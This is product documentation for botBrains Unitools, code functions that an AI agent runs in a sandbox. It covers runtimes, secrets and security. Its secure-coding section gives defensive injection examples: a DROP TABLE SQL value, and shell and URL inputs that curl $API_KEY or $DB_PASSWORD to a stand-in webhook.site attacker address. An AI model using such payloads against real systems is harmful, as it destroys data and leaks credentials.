Skip to main content
Unitool editor showing Definition panel with function name, description, input fields, and secrets on the left, and a Shell code editor with comments explaining environment variables, output, and execution on the right Unitools are code functions (Python or Shell) that you write ahead of time. During a conversation, the AI agent decides when to call a Unitool and provides the input values, but the code itself stays fixed. You control what runs; the AI controls when and with what data. Use Unitools to query databases, call APIs, process data, or run any custom logic in a secure, isolated environment.

How it works

When you create a Unitool, you define:
  1. Input fields
    Parameters the AI agent collects from the conversation
  2. Code
    Python or Shell script that processes the inputs
  3. Secrets
    Environment variables for credentials (API keys, database URLs)
During a conversation, when the AI agent determines your Unitool is relevant, it:
  1. Extracts the required field values from the conversation context
  2. Executes your code in an isolated sandbox
  3. Returns the result to continue the conversation
Unitool creation interface showing input fields panel, code editor with Python runtime selected, and secrets section

Runtimes

Python scripts define a handle(fields) function that receives input values and returns a result. Use print() for debugging-output appears in the Logs tab. Shell scripts receive inputs via the field command. Write your result to $OUTPUT. The complete input JSON is available in $INPUT.

Pre-installed Python packages

You can install additional Python packages using uv (uv pip install <package>), but this increases runtime latency since packages are installed on every execution.

Shell tools

Shell scripts run in bash with the following CLI tools available: curl, jq, python, and uv.

Execution environment

Your code runs in an isolated Linux VM. Each execution gets a fresh environment-installed packages don’t persist between runs.
Machine specifications are subject to change as we optimize the platform.
Limitation: File uploads are not yet supported. Documents uploaded by users in conversations cannot be passed to Unitools.

Input fields

Fields define the parameters your Unitool accepts. The AI agent automatically extracts these values from the conversation.

Field types

Required vs optional

Mark fields as required when the Unitool can’t function without them. Optional fields have sensible defaults in your code:

Secrets

Store sensitive credentials as secrets rather than hardcoding them. Secrets are:
  • Encrypted at rest
  • Injected as environment variables at runtime
  • Never exposed in logs or results
Never print() or return secret values they would appear in logs visible to users reviewing conversation history.

Security

“With great power comes great responsibility.”
Unitools give you the ability to execute arbitrary code that connects to your databases, APIs, and external services. Security is a shared responsibility between botBrains and you.

What botBrains ensures

We provide infrastructure-level isolation to protect you and other customers. Your code runs in a dedicated sandbox that can’t access other customers’ environments or data. Every execution starts with a fresh VM-no state, files, or processes persist between runs. The sandbox has no access to botBrains internal systems or cloud metadata endpoints; your code can only reach the public internet.
botBrains reserves the right to suspend Unitool access at any time without prior notice, particularly if abuse is suspected.

Your responsibilities

You are responsible for the security of the code you write. Common risks include:

Writing secure code

The isolated sandbox protects botBrains and other customers-but injection vulnerabilities in your code put your own systems at risk. Attackers could steal your credentials, exfiltrate data from your databases, or escalate privileges on your external systems. Secret leaks. Never log or return sensitive values:
SQL injection. When you interpolate user input directly into SQL queries, attackers can execute arbitrary database commands. A malicious order_id like '; DROP TABLE orders; -- could delete your data.
Prefer Python for database operations. Its parameterized queries are more robust and harder to misuse than shell alternatives.
Shell injection. When you pass user input to shell commands without proper escaping, attackers can execute arbitrary commands. A malicious input like "; curl -X POST -d "$API_KEY" https://webhook.site/attacker-id # could exfiltrate your secrets to an attacker-controlled server.
URL injection. When you place user input directly in URLs, attackers can manipulate the request destination or parameters. A malicious input like x]"; curl -d "$DB_PASSWORD" https://webhook.site/attacker-id # could steal credentials.

Prohibited activities

botBrains may suspend your access at any time. The following activities will get you suspended.

Templates & Use Cases

Unitool Templates page showing categorized starter templates for API, Database, and 101 Guides with Explore links
Starting from a draft is much easier than from a blank piece of paper.
Templates are drafts of common use cases that you can customize as needed. You can also use AI-suggested Unitools to create and edit existing Unitools faster.
The AI does not have access to your secrets when editing Unitools that have secrets defined.

Database lookup

Query your PostgreSQL, MySQL, MongoDB, or redis databases:

API integration

Call external APIs and return processed data:

Webhook trigger

Send data to automation platforms like n8n or Zapier:

Web scraping

Extract real-time data from websites:

Best practices

  • Keep it focused
    Each Unitool should do one thing well. Create separate Unitools for different operations rather than one complex script.
  • Handle errors well Return meaningful error messages the AI agent can relay to users:
  • Minimize latency
    Users are waiting. Avoid installing packages at runtime, keep API calls efficient, and use connection pooling for databases.
  • Limit output size
    The system truncates results over 200 KB. Return only the data the AI agent needs, not entire database tables.